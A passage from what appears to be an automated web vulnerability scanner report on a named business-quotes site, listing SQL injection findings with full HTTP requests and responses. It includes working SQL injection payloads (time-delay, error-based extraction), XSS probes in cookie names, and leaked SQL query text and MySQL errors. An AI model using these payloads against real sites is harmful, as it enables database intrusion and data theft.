OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:36:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=tltqnuvtrnu6gd83890sthugk4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address96573606'%20or%201%3d2--%20&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:36:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=c04ocas11t7d3vpggl0258e3t7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Business Loans, Use InsideUp to Get Quotes and Compare Business Loan Providers </title>
   <meta name="description" content="Let business loan providers compete for your loan needs. Compare local and national business loan companies."/>
   <meta name="keywords" content=" Business Loans "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 15    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11, #step_12, #step_13, #step_14, #step_15, #step_16,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr>
            <td width="175" vali
...[SNIP]...

1.16. http://www.insideup.com/ppc/leadflow/bulo00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the address parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:19:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

1.17. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_342_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:20:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

1.18. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:41:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:41:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.19. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

